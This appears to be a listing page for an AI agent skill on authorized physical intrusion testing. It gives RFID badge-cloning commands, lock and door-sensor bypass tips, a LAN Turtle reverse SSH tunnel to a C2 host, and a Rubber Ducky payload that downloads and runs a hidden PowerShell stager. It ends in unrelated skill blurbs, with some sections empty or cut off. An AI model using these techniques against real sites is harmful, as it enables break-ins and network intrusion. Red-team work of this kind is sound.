external/anthropic-cybersecurity-skills/skills/performing-physical-intrusion-assessment/SKILL.md
Conduct authorized physical penetration testing using tailgating, badge cloning, lock bypassing, and rogue device deployment to evaluate facility security controls.
npx skillsauth add seikaikyo/dash-skills performing-physical-intrusion-assessmentInstall this skill globally with one command. Works with Claude Code, Cursor, and Windsurf.
3 of 9 scanners reported clean
Some scanners were skipped, did not run, or reported a non-clean status. Review each row below.
Physical intrusion assessment evaluates an organization's physical security controls by attempting to gain unauthorized access to facilities, server rooms, and restricted areas. This includes tailgating employees, cloning RFID access badges, bypassing locks, deploying rogue network devices, and testing security guard procedures. Physical security testing is a critical component of full-scope red team engagements, as it often provides the most direct path to network access. MITRE ATT&CK maps physical access techniques under T1200 (Hardware Additions) and T1091 (Replication Through Removable Media).
| Technique ID | Name | Tactic | |---|---|---| | T1200 | Hardware Additions | Initial Access | | T1091 | Replication Through Removable Media | Initial Access | | T1199 | Trusted Relationship | Initial Access | | T1078 | Valid Accounts | Initial Access |
| Tool | Purpose | Approximate Cost | |---|---|---| | Proxmark3 RDV4 | RFID badge cloning (125kHz/13.56MHz) | $300 | | Flipper Zero | Multi-protocol RF analysis | $170 | | Lock pick set (Sparrows) | Mechanical lock bypassing | $35 | | Under-door tool (UDT) | Bypass door from outside | $30 | | Shove knife / latch slip | Spring bolt bypass | $15 | | LAN Turtle | Rogue network implant | $60 | | WiFi Pineapple | Rogue wireless AP | $100 | | Rubber Ducky / Bash Bunny | USB keystroke injection | $50-80 | | Clipboard + hard hat + hi-vis | Social engineering props | $20 | | Body camera | Evidence documentation | $50 |
Tailgating involves following an authorized person through a secured entry point without presenting credentials.
Methods:
Countermeasures to test:
# Proxmark3 - Read a low-frequency (125kHz) HID card
proxmark3> lf hid read
# Output: HID Prox TAG ID: 2006xxxxxx - FC: 123 CN: 45678
# Clone to a T5577 blank card
proxmark3> lf hid clone --fc 123 --cn 45678
# Read high-frequency (13.56MHz) MIFARE card
proxmark3> hf mf rdbl --blk 0 -k FFFFFFFFFFFF
# Long-range capture with custom antenna (up to 3 feet)
proxmark3> lf hid read # with extended antenna
# Flipper Zero - Read and emulate
# RFID > Read > Hold card to Flipper > Save > Emulate
Badge cloning attack flow:
| Lock Type | Bypass Method | Difficulty | |---|---|---| | Pin tumbler (standard) | Pick, rake, or bump key | Easy-Medium | | Wafer lock (filing cabinets) | Pick or jiggle | Easy | | Tubular lock (vending, server) | Tubular pick tool | Easy | | Electronic lock (keypad) | Shoulder surf, thermal camera | Medium | | Magnetic lock (mag lock) | Under-door tool, REX sensor bypass | Medium | | Smart lock (Bluetooth) | Replay attack, firmware exploit | Hard |
# Electronic keypad - thermal imaging after use
# Warmer keys = more recently pressed
# Use FLIR camera to capture heat signatures within 30 seconds
# REX (Request to Exit) sensor bypass
# Insert thin wire or use a can of compressed air to trigger motion sensor
# on the inside of a mag-locked door
# LAN Turtle - Plug into exposed Ethernet port
# Provides SSH reverse tunnel back to C2 server
# Auto-configures as man-in-the-middle
# Configure LAN Turtle for reverse SSH
# Module: AutoSSH
# Host: c2.redteam.com
# Port: 22
# Remote port: 2222
# WiFi Pineapple - Deploy in common area
# Captures wireless credentials via evil twin attack
# Exfiltrates data over cellular modem
# USB Rubber Ducky - Drop in parking lot or leave on desk
# Payload: Download and execute C2 agent
# Duckyscript:
# DELAY 1000
# GUI r
# DELAY 500
# STRING powershell -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('https://c2.redteam.com/stager.ps1')"
# ENTER
Search external waste containers and recycling bins for:
development
拋棄式 HTML mockup 比稿:產出 2 到 3 個設計立場不同的變體(密度 / 版式 / 強調軸,不是換色),各附取捨說明,最後給有立場的對比結論。適用:「畫個草圖」「比較 A 版 B 版」「先看方向再做」「給我看幾種做法」。要 production 元件或設計已定案時不適用。
tools
需求不明時的意圖萃取訪談:一次一題、每題附上自己的猜測、聽出「真正想要 vs 覺得應該要」,直到能預測使用者反應(約 95% 信心)才動工。適用:需求缺少對象 / 動機 / 成功標準 / 約束,或使用者點名「訪談我」「先確認一下」「我們確定嗎」。明確自足的指示、純資訊查詢、機械性操作不適用。
development
對非平凡決策啟動新鮮 context 對抗審查(找碴不背書),在修正還便宜的時候抓出錯誤方向。適用:高風險改動(production、資安敏感邏輯、不可逆操作)、不熟的程式碼、要宣稱「這樣是安全的 / 可行的」之前。機械性操作與一行修改不適用。
testing
Reference for writing and editing agent skills well — the vocabulary and principles that make a skill predictable. Consult when authoring, reviewing, or pruning a SKILL.md.